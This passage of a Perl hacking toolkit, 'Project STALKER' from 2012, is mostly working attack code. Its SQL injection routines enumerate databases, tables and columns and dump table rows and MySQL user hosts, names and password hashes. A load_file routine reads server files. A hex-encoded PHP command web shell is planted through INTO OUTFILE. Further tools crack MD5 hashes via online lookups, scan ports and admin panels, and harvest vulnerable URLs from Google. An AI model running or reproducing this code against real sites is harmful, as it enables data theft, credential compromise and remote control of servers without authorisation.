693. print "\n\n[Full Path Discloure] : ";
694. chomp(my $path = <STDIN>);
695. &into($_[0],$_[1],$path,$save);
696. }
697. elsif($rta=~/readfile/) {
698. loadfile($_[0],$_[1],$save);
699. }
700. elsif ($rta=~/dumper (.*) (.*) (.*)/) {
701. my ($tabla,$col1,$col2) = ($1,$2,$3);
702. &dump($_[0],$col1,$col2,$tabla,$_[1],$save);
703. &reload;
704. }
705. elsif ($rta =~/details/) {
706. &details($_[0],$_[1],$save);
707. &reload;
708. }
709. else {
710. &reload;
711. }
712. }
713.  
714.  
715.  
716. sub schematables {
717. $real = "1";
718. my ($page,$bypass,$save) = @_;
719. savefile($save.".txt","\n");
720. print "\n";
721. my $page1 = $page;
722. ($pass1,$pass2) = &bypass($_[1]);
723. savefile($save.".txt","[DB] : default");
724. print "\n[+] Searching tables with schema\n\n";
725. $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
726. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
727. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
728. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
729. my $resto = $1;
730. $total = $resto - 17;
731. print "[+] Tables Length :  $total\n\n";
732. savefile($save.".txt","[+] Searching tables with schema\n");
733. savefile($save.".txt","[+] Tables Length :  $total\n");
734. my $limit = $1;
735. for my $limit(17..$limit) {
736. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
737. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
738. my $table = $1;
739. chomp $table;
740. print "[Table $real Found : $table ]\n";
741. savefile($save.".txt","[Table $real Found : $table ]");
742. $real++;
743. }}
744. print "\n";
745. } else {
746. print "\n[-] information_schema = ERROR\n";
747. }    
748. }
749.  
750. sub reload {
751. &menu_options($_[0]);
752. }
753.  
754.  
755. sub schemacolumns {
756. my ($page,$bypass,$save,$table) = @_;
757. my $page3 = $page;
758. my $page4 = $page;
759. savefile($save.".txt","\n");
760. print "\n";
761. ($pass1,$pass2) = &bypass($bypass);
762. print "\n[DB] : default\n";
763. savefile($save.".txt","[DB] : default");
764. savefile($save.".txt","[Table] : $table\n");
765. $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
766. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
767. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
768. print "\n[Columns Length : $1 ]\n\n";
769. savefile($save.".txt","[Columns Length : $1 ]\n");
770. my $si = $1;
771. chomp $si;
772. $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
773. $real = "1";
774. for my $limit2(0..$si) {
775. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
776. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
777. print "[Column $real] : $1\n";
778. savefile($save.".txt","[Column $real] : $1");
779. $real++;
780. }}
781. print "\n";
782. } else {
783. print "\n[-] information_schema = ERROR\n";
784. }}
785.  
786. sub schemadb {
787. my ($page,$bypass,$save) = @_;
788. my $page1 = $page;
789. savefile($save.".txt","\n");
790. print "\n\n[+] Searching DBS\n\n";
791. ($pass1,$pass2) = &bypass($bypass);
792. $page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
793. $code = toma($page.$pass1."from".$pass1."information_schema.schemata");
794. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
795. my $limita = $1;
796. print "[+] Databases Length : $limita\n\n";
797. savefile($save.".txt","[+] Databases Length : $limita\n");
798. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
799. $real = "1";
800. for my $limit(0..$limita) {
801. $code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
802. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
803. my $control = $1;
804. if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
805. print "[Database $real Found] $control\n";
806. savefile($save.".txt","[Database $real Found] : $control");
807. $real++;
808. }
809. }
810. }
811. print "\n";
812. } else {
813. print "[-] information_schema = ERROR\n";
814. }
815. }
816.  
817. sub schematablesdb {
818. my $page = $_[0];
819. my $db = $_[2];
820. my $page1 = $page;
821. savefile($_[3].".txt","\n");
822. print "\n\n[+] Searching tables with DB $db\n\n";
823. ($pass1,$pass2) = &bypass($_[1]);
824. savefile($_[3].".txt","[DB] : $db");
825. $page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
826. $page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
827. $code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
828. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
829. if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {  
830. print "[+] Tables Length :  $1\n\n";
831. savefile($_[3].".txt","[+] Tables Length :  $1\n");
832. my $limit = $1;
833. $real = "1";
834. for my $lim(0..$limit) {
835. $code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
836. #print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
837. if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
838. my $table = $1;
839. chomp $table;
840. savefile($_[3].".txt","[Table $real Found : $table ]");
841. print "[Table $real Found : $table ]\n";
842. $real++;
843. }}
844. print "\n";
845. } else {
846. print "\n[-] information_schema = ERROR\n";
847. }}
848.  
849. sub schemacolumnsdb {
850. my ($page,$bypass,$db,$table,$save) = @_;
851. my $page3 = $page;
852. my $page4 = $page;
853. print "\n\n[+] Searching columns in table $table with DB $db\n\n";
854. savefile($save.".txt","\n");
855. ($pass1,$pass2) = &bypass($_[1]);
856. savefile($save.".txt","\n[DB] : $db");
857. savefile($save.".txt","[Table] : $table");
858. $page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
859. $code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
860. if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
861. print "\n[Columns length : $1 ]\n\n";
862. savefile($save.".txt","[Columns length : $1 ]\n");
863. my $si = $1;
864. chomp $si;
865. $page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
866. $real = "1";
867. for my $limit2(0..$si) {
868. $code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
869. if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
870. print "[Column $real] : $1\n";
871. savefile($save.".txt","[Column $real] : $1");
872. $real++;
873. }
874. }
875. } else {
876. print "\n[-] information_schema = ERROR\n";
877. }
878. print "\n";
879. }
880.  
881. sub mysqluser {
882. my ($page,$bypass,$save) = @_;
883. my $cop = $page;
884. my $cop1 = $page;
885. savefile($save.".txt","\n");
886. print "\n\n[+] Finding mysql.users\n";
887. ($pass1,$pass2) = &bypass($bypass);
888. $page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
889. $code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
890. if ($code=~/RATSXPDOWN/ig){
891. $cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
892. $code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
893. if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
894. print "\n[+] Users Found : $1\n\n";
895. savefile($save.".txt","\n[+] Users mysql Found : $1\n");
896. for my $limit(0..$1) {
897. $cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
898. $code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
899. if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
900. print "[Host] : $1 [User] : $2 [Password] : $3\n";
901. savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
902. } else {
903. print "\n";
904. &reload;
905. }
906. }
907. }
908. } else {
909. print "\n[-] mysql.user = ERROR\n\n";
910. }
911. }
912.  
913. sub dump {
914. savefile($_[5].".txt","\n");
915. my $page = $_[0];
916. ($pass1,$pass2) = &bypass($_[4]);
917. if ($page=~/(.*)hackman(.*)/){
918. my $start = $1;
919. my $end = $2;
920. print "\n\n[+] Extracting values...\n\n";
921. $concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
922. $val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
923. $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
924. if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
925. $tota = $1;
926. print "[+] Table : $_[3]\n";
927. print "[+] Length of the rows : $tota\n\n";
928. print "[$_[1]] [$_[2]]\n\n";
929. savefile($_[5].".txt","[Table] : $_[3]");
930. savefile($_[5].".txt","[+] Length of the rows: $tota\n");
931. savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
932. for my $limit(0..$tota) {
933. chomp $limit;
934. $injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
935. if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
936. savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
937. print "[$_[1]] : $1   [$_[2]] : $2\n";
938. } else {
939. print "\n\n[+] Extracting Finish\n\n";
940. last;
941. &reload;
942. }
943. }
944. } else {
945. print "[-] Not Found any DATA\n\n";
946. }}}
947.  
948.  
949. sub loadfile {
950. savefile($_[2].".txt","\n");
951. ($pass1,$pass2) = &bypass($_[1]);
952. if ($_[0] =~/(.*)hackman(.*)/g) {
953. my $start = $1; my $end = $2;
954. print "\n\n[+] File to read : ";
955. chomp (my $file = <stdin>);
956. $concat = "unhex(hex(concat(char(107,48,98,114,97),load_file(".encode($file)."),char(107,48,98,114,97))))";
957. my $code = toma($start.$concat.$end.$pass2);
958. chomp $code;
959. if ($code=~/k0bra(.*)k0bra/s) {
960. print "[File Found] : $file\n";
961. print "\n[Source Start]\n\n";
962. print $1;
963. print "\n\n[Source End]\n\n";
964. savefile($_[2].".txt","[File Found] : $file");
965. savefile($_[2].".txt","\n[Source Start]\n");
966. savefile($_[2].".txt","$1");
967. savefile($_[2].".txt","\n[Source End]\n");
968. }}
969. &reload;
970. }
971.  
972.  
973. sub into {
974. print "\n\n[Status] : Injecting a SQLI for create a shell\n\n";
975. my ($page,$bypass,$dir,$save) = @_;
976. savefile($save.".txt","\n");
977. print "\n";
978. ($pass1,$pass2) = &bypass($bypass);
979. my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
980. if ($path=~/\/(.*)$/) {    
981. my $path1 = $1;
982. my $path2 = $path1;
983. $path2 =~s/$1//;
984. $dir =~s/$path1//ig;
985. $shell = $dir."/"."shell.php";
986. if ($page =~/(.*)hackman(.*)/ig) {
987. my  ($start,$end) = ($1,$2);
988. $code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2);
989. $code1 = toma("http://".$auth."/".$path2."/"."shell.php");
990. if ($code1=~/Mini Shell By Doddy/ig) {
991. print "[shell up] : http://".$auth."/".$path2."/"."shell.php\a";
992. savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php");
993. } else {
994. print "[shell] : Not Found\n";
995. }
996. }
997. }
998. print "\n\n";
999. &reload;
1000. }
1001.  
1002.  
1003. sub bypass {
1004. if ($_[0] eq "/*") { return ("/**/","/*"); }
1005. elsif ($_[0] eq "%20") { return ("%20","%00"); }
1006. else {return ("+","--");}}
1007.  
1008. sub ascii {
1009. return join ',',unpack "U*",$_[0];
1010. }
1011.  
1012. sub base {
1013. $re = encode_base64($_[0]);
1014. chomp $re;
1015. return $re;
1016. }
1017.  
1018. sub base_de {
1019. $re = decode_base64($_[0]);
1020. chomp $re;
1021. return $re;
1022. }
1023.  
1024.  
1025. sub download {
1026. if ($nave->mirror($_[0],$_[1])) {
1027. if (-f $_[1]) {
1028. return true;
1029. }}}
1030.  
1031.  
1032. sub hex_en {
1033. my $string = $_[0];
1034. $hex = '0x';
1035. for (split //,$string) {
1036. $hex .= sprintf "%x", ord;
1037. }
1038. return $hex;
1039. }
1040.  
1041. sub hex_de {
1042. my $text = shift;
1043. $text =~ s/^0x//;
1044. $encode = join q[], map { chr hex } $text =~ /../g;
1045. return $encode;
1046. }
1047.  
1048. sub ascii_de {
1049. my $text = shift;
1050. $text = join q[], map { chr } split q[,],$text;
1051. return $text;
1052. }
1053.  
1054. sub getprocess {
1055.  
1056. my %procesos;
1057.  
1058. my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
1059. my $dos = $uno->ConnectServer("","root\\cimv2");
1060.  
1061. foreach my $pro (in $dos->InstancesOf("Win32_Process")){
1062. $procesos{$pro->{Caption}} = $pro->{ProcessId};
1063. }
1064. return %procesos;
1065. }
1066.  
1067. sub killprocess {
1068.  
1069. my $pid = shift;
1070.  
1071. if (Win32::Process::KillProcess($pid,"")) {
1072. return true;
1073. } else {
1074. return false;
1075. }
1076. }
1077.  
1078. sub getip {
1079. my $get = gethostbyname($_[0]);
1080. return inet_ntoa($get);
1081. }
1082.  
1083.  
1084.  
1085. sub ftp {
1086.  
1087. my ($ftp,$user,$pass) = @_;
1088.  
1089. if (my $socket = Net::FTP->new($ftp)) {
1090. if ($socket->login($user,$pass)) {
1091.  
1092. print "\n[+] Enter of the server FTP\n\n";
1093.  
1094. menu:
1095.  
1096. print "\n\nftp>";
1097. chomp (my $cmd = <stdin>);
1098. print "\n\n";
1099.  
1100. if ($cmd=~/help/) {
1101. print q(
1102.  
1103. help : show information
1104. cd : change directory <dir>
1105. dir : list a directory
1106. mdkdir : create a directory <dir>
1107. rmdir : delete a directory <dir>
1108. pwd : directory  
1109. del : delete a file <file>
1110. rename : change name of the a file <file1> <file2>
1111. size : size of the a file <file>
1112. put : upload a file <file>
1113. get : download a file <file>
1114. cdup : change dir <dir>
1115. exit : ??
1116.  
1117.  
1118. );
1119. }
1120.  
1121. if ($cmd=~/dir/ig) {
1122. if (my @files = $socket->dir()) {
1123. for(@files) {
1124. print "[+] ".$_."\n";
1125. }
1126. } else {
1127. print "\n\n[-] Error\n\n";
1128. }
1129. }
1130.  
1131. if ($cmd=~/pwd/ig) {
1132. print "[+] Path : ".$socket->pwd()."\n";
1133. }
1134.  
1135. if ($cmd=~/cd (.*)/ig) {
1136. if ($socket->cwd($1)) {
1137. print "[+] Directory changed\n";
1138. } else {
1139. print "\n\n[-] Error\n\n";
1140. }
1141. }
1142.  
1143. if ($cmd=~/cdup/ig) {
1144. if (my $dir = $socket->cdup()) {
1145. print "\n\n[+] Directory changed\n\n";
1146. } else {
1147. print "\n\n[-] Error\n\n";
1148. }
1149. }
1150.  
1151. if ($cmd=~/del (.*)/ig) {
1152. if ($socket->delete($1)) {
1153. print "[+] File deleted\n";
1154. } else {
1155. print "\n\n[-] Error\n\n";
1156. }
1157. }
1158.  
1159. if ($cmd=~/rename (.*) (.*)/ig) {
1160. if ($socket->rename($1,$2)) {
1161. print "[+] File Updated\n";
1162. } else {
1163. print "\n\n[-] Error\n\n";
1164. }
1165. }
1166.  
1167. if ($cmd=~/mkdir (.*)/ig) {
1168. if ($socket->mkdir($1)) {
1169. print "\n\n[+] Directory created\n";
1170. } else {
1171. print "\n\n[-] Error\n\n";
1172. }
1173. }
1174.  
1175. if ($cmd=~/rmdir (.*)/ig) {
1176. if ($socket->rmdir($1)) {
1177. print "\n\n[+] Directory deleted\n";
1178. } else {
1179. print "\n\n[-] Error\n\n";
1180. }
1181. }
1182.  
1183. if ($cmd=~/exit/ig) {
1184. next;
1185. }
1186.  
1187. if ($cmd=~/get (.*) (.*)/ig) {
1188. print "\n\n[+] Downloading file\n\n";
1189. if ($socket->get($1,$2)) {
1190. print "[+] Download completed";
1191. } else {
1192. print "\n\n[-] Error\n\n";
1193. }
1194. }
1195.  
1196. if ($cmd=~/put (.*) (.*)/ig) {
1197. print "\n\n[+] Uploading file\n\n";
1198. if ($socket->put($1,$2)) {
1199. print "[+] Upload completed";
1200. } else {
1201. print "\n\n[-] Error\n\n";
1202. }
1203. }
1204.  
1205. if ($cmd=~/quit/) {
1206. next;
1207. }
1208.  
1209. goto menu;
1210.  
1211. } else {
1212. print "\n[-] Failed the login\n\n";
1213. }
1214.  
1215. } else {
1216. print "\n\n[-] Error\n\n";
1217. }
1218.  
1219.  
1220.  
1221. }
1222.  
1223. sub crackit {
1224.  
1225. my $target = shift;
1226.  
1227. chomp $target;
1228.  
1229. my %hash = (
1230.      
1231. 'http://md5.hashcracking.com/search.php?md5=' =>  {
1232. 'tipo' => 'get',
1233. 'regex' => "Cleartext of $target is (.*)",
1234. },
1235.  
1236. 'http://www.hashchecker.com/index.php?_sls=search_hash' =>  {  
1237. 'variables'=>{'search_field'=>$target,'Submit'=>'search'},
1238. 'regex' => "<td><li>Your md5 hash is :<br><li>$target is <b>(.*)<\/b>",
1239. },
1240.  
1241. 'http://md5.rednoize.com/?q=' =>  {    
1242. 'tipo'=> 'get',
1243. 'regex' => "<div id=\"result\" >(.*)<\/div>"
1244. },
1245.  
1246. 'http://md52.altervista.org/index.php?md5=' =>  {  
1247. 'tipo'=> 'get',
1248. 'regex' => "<br>Password: <font color=\"Red\">(.*)<\/font><\/b>"
1249. }
1250.  
1251. );
1252.  
1253. for my $data(keys %hash) {
1254. if ($hash{$data}{tipo} eq "get") {
1255. $code = toma($data.$target);
1256. if ($code=~/$hash{$data}{regex}/ig) {
1257. my $found = $1;
1258. unless($found=~/\[Non Trovata\]/) {
1259. return $found;
1260. last;
1261. }}}
1262. else {
1263. $code = tomar($data,$hash{$data}{variables});
1264. if ($code=~/$hash{$data}{regex}/ig) {
1265. my $found = $1;
1266. return $found;
1267. last;
1268. }}}
1269. return "false01";
1270. }
1271.  
1272. sub ver_length {
1273. return true if length($_[0]) == 32;
1274. }
1275.  
1276.  
1277. sub scanpaths {
1278.  
1279. my $urla = $_[0];
1280.  
1281. print "\n[+] Find paths in $urla\n\n\n";
1282. my @urls = repes(get_links(toma($urla)));
1283. for $url(@urls) {
1284. my $web = $url;
1285. my ($scheme, $auth, $path, $query, $frag)  = uri_split($url);
1286. if ($_[0] =~/$auth/ or $auth eq "") {
1287. if ($path=~/(.*)\/(.*)\.(.*)$/) {
1288. my $borrar = $2.".".$3;
1289. if ($web=~/(.*)$borrar/) {
1290. my $co = $1;
1291. unless ($co=~/$auth/) {
1292. $co = $urla.$co;
1293. }
1294. $code = toma($co);
1295. if ($code=~/Index Of/ig) {
1296. print "[Link] : ".$co."\n";
1297. saveyes("logs/paths-found.txt",$co);
1298. }}}}}}
1299.  
1300.  
1301. sub scanport {
1302.  
1303. my %ports = ("21"=>"ftp",
1304. "22"=>"ssh",
1305. "25"=>"smtp",
1306. "80"=>"http",
1307. "110"=>"pop3",
1308. "3306"=>"mysql"
1309. );
1310.  
1311.  
1312. print "[+] Scanning $_[0]\n\n\n";
1313.  
1314. for my $port(keys %ports) {
1315.  
1316. if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
1317. print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
1318. }
1319. }
1320. print "\n\n[+] Finish\n";
1321. }
1322.  
1323.  
1324. sub scanpanel {
1325. print "[+] Scanning $_[0]\n\n\n";
1326. for $path(@panels) {
1327. $code = tomax($_[0]."/".$path);
1328. if ($code->is_success) {
1329. print "[Link] : ".$_[0]."/".$path."\n";
1330. saveyes("logs/panel-logs.txt",$_[0]."/".$path);
1331. }
1332. }
1333. print "\n\n[+] Finish\n";
1334. }
1335.  
1336. sub google {
1337. my($a,$b) = @_;
1338. my @founds;
1339. for ($pages=10;$pages<=$b;$pages=$pages+10) {
1340. $code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
1341. while($code=~/(?<="r"><. href=")(.+?)"/mig) {
1342. my $url = $1;
1343. if($url=~/\/url\?q\=(.*?)\&amp\;/) {
1344. push(@founds,uri_unescape($1));
1345. }}}
1346. my @founds = repes(cortar(@founds));
1347. return @founds;
1348. }
1349.  
1350. sub sql {
1351.  
1352. my ($pass1,$pass2) = ("+","--");
1353. my $page = shift;
1354. $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
1355. if ($code1=~/The used SELECT statements have a different number of columns/ig) {
1356. print "[+] SQLI : $page\a\n";
1357. saveyes("logs/sql-logs.txt",$page);
1358. }}
1359.  
1360. sub get_links {
1361.  
1362. $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );
1363. return @links;
1364.  
1365. sub agarrar {
1366. my ( $a, %b ) = @_;
1367. push( @links, values %b );
1368. }}
1369.  
1370.  
1371. sub repes {
1372. my @limpio;
1373. foreach $test(@_) {
1374. push @limpio,$test unless $repe{$test}++;
1375. }
1376. return @limpio;
1377. }
1378.  
1379. sub cortar {
1380. my @nuevo;
1381. for(@_) {
1382. if ($_ =~/=/) {
1383. @tengo = split("=",$_);
1384. push(@nuevo,@tengo[0]."=");
1385. } else {
1386. push(@nuevo,$_);
1387. }}
1388. return @nuevo;
1389. }
1390.  
1391. sub head {
1392. cprint "\x0311"; #13
1393. print "\n\n-- == Project STALKER == --\n\n";
1394. cprint "\x030";
1395. }
1396.  
1397. sub copyright {
1398. cprint "\x0311"; #13
1399. print"\n\n(C) Doddy Hackman 2012\n\n";
1400. cprint "\x030";
1401. }
1402.  
1403. sub toma {
1404. return $nave->get($_[0])->content;
1405. }
1406.  
1407. sub tomax {
1408. return $nave->get($_[0]);
1409. }
1410.  
1411. sub tomar {
1412. my ($web,$var) = @_;
1413. return $nave->post($web,[%{$var}])->content;
1414. }
1415.  
1416.  
1417. sub conectar {
1418.  
1419. my $sockex = new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $_[1],
1420. Proto => "tcp",Timeout  => 5);
1421.  
1422. print $sockex $_[2]."\r\n";
1423. $sockex->read($re,5000);
1424. $sockex->close;
1425. return $re."\r\n";
1426. }
1427.  
1428.  
1429. sub enter {
1430.  
1431. my ($host,$user,$pass) = @_;
1432.  
1433. print "[+] Connecting to the server\n";
1434.  
1435. $info = "dbi:mysql::".$host.":3306";
1436. if (my $enter = DBI->connect($info,$user,$pass,{PrintError=>0})) {
1437.  
1438. print "\n[+] Enter in the database";
1439.  
1440. while(1) {
1441. print "\n\n\n[+] Query : ";
1442. chomp(my $ac = <stdin>);
1443.  
1444. if ($ac eq "exit") {
1445. $enter->disconnect;
1446. print "\n\n[+] Closing connection\n\n";
1447. last;
1448. }
1449.  
1450. $re = $enter->prepare($ac);
1451. $re->execute();
1452. my $total = $re->rows();
1453.  
1454. my @columnas = @{$re->{NAME}};
1455.  
1456. if ($total eq "-1") {
1457. print "\n\n[-] Query Error\n";
1458. next;
1459. } else {
1460. print "\n\n[+] Result of the query\n";
1461. if ($total eq 0) {
1462. print "\n\n[+] Not rows returned\n\n";
1463. } else {
1464. print "\n\n[+] Rows returned : ".$total."\n\n\n";
1465. for(@columnas) {
1466. print $_."\t\t";
1467. }
1468. print "\n\n";
1469. while (@row = $re->fetchrow_array) {
1470. for(@row) {
1471. print $_."\t\t";
1472. }
1473. print "\n";
1474. }}}}
1475. } else {
1476. print "\n[-] Error connecting\n";
1477. }}
1478.  
1479. sub encode {
1480. my $string = $_[0];
1481. $hex = '0x';
1482. for (split //,$string) {
1483. $hex .= sprintf "%x", ord;
1484. }
1485. return $hex;
1486. }
1487.  
1488. sub saveyes {
1489. open (SAVE,">>".$_[0]);
1490. print SAVE $_[1]."\n";
1491. close SAVE;
1492. }
1493.  
1494. sub savefile {
1495. open (SAVE,">>logs/webs/".$_[0]);
1496. print SAVE $_[1]."\n";
1497. close SAVE;
1498. }
1499.  
1500. sub coleccionar {
1501. opendir DIR,$_[0];
1502. my @archivos = readdir DIR;
1503. close DIR;
1504. return @archivos;
1505. }
1506.  
1507. sub infocon {
1508. my $target = shift;
1509.  
1510. my $get = gethostbyname($target);
1511. my $target = inet_ntoa($get);
1512.  
1513. print "[+] Getting info\n\n\n";
1514. $total = "http://www.melissadata.com/lookups/iplocation.asp?ipaddress=$target";
1515. $re = toma($total);
1516.  
1517. if ($re=~/City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/) {
1518. print "[+] City : $2\n";
1519. } else {
1520. print "[-] Not Found\n";
1521. copyright();
1522. }
1523. if ($re=~/Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/) {
1524. print "[+] Country : $2\n";
1525. }
1526. if ($re=~/State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/) {
1527. print "[+] State or Region : $2\n";
1528. }
1529.  
1530. print "\n\n[+] Getting Hosts\n\n\n";
1531.  
1532. my $code = toma("http://www.ip-adress.com/reverse_ip/".$target);
1533.  
1534. while($code=~/whois\/(.*?)\">Whois/g) {
1535. my $dns = $1;
1536. chomp $dns;
1537. print "[DNS] : $dns\n";
1538. }
1539. }
1540.  
1541. sub whois {
1542.  
1543. my $ob = shift;
1544. my $code = tomar("http://networking.ringofsaturn.com/Tools/whois.php",{"domain"=>$ob,"submit"=>"submit"});
1545.  
1546. my @chau = ("&quot;","&gt;&gt;&gt;","&lt;&lt;&lt;");
1547.  
1548. if($code=~/<pre>(.*?)<\/pre>/sig) {
1549. my $resul = $1;
1550. chomp $resul;
1551.  
1552. for my $cha(@chau) {
1553. $resul=~s/$cha//ig;
1554. }
1555.  
1556. if($resul=~/Whois Server Version/) {
1557. return $resul;
1558. } else {
1559. return "Not Found";
1560. }}}
1561.  
1562. sub partimealmedio {
1563. my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
1564. my $save = $auth;
1565. $save=~s/:/_/;
1566. return $save;
1567. }
1568.  
1569. sub helpme {
1570.  
1571. cprint "\x035";
1572. print qq(
1573. This program was coded By Doddy Hackman in the year 2012
1574.  
1575. [+] Commands :
1576.  
1577. [++] cmd_getinfo [Windows Only]
1578. [++] cmd_getip <host>
1579. [++] cmd_getlink <page>
1580. [++] cmd_getprocess [Windows Only]
1581. [++] cmd_killprocess <pid process> [Windows Only]
1582. [++] cmd_conec <host> <port> <command>  
1583. [++] cmd_allow <host>
1584. [++] cmd_paths <page>
1585. [++] cmd_encodehex <text>
1586. [++] cmd_decodehex <text>
1587. [++] cmd_encodeascii <text>
1588. [++] cmd_decodeascii <text>
1589. [++] cmd_encodebase <text>
1590. [++] cmd_decodebase <text>
1591. [++] cmd_scanport <host>
1592. [++] cmd_panel <page>
1593. [++] cmd_getpass <hash>
1594. [++] cmd_kobra <page>
1595. [++] cmd_ftp <host> <user> <pass>
1596. [++] cmd_mysql <host> <user> <pass>
1597. [++] cmd_locate <ip>
1598. [++] cmd_whois <dom>
1599. [++] cmd_navegator
1600. [++] cmd_scangoogle
1601. [++] cmd_help
1602. [++] cmd_exit
1603. );
1604. cprint "\n\n\n\x030";
1605. }
1606.  
1607. #  The End ?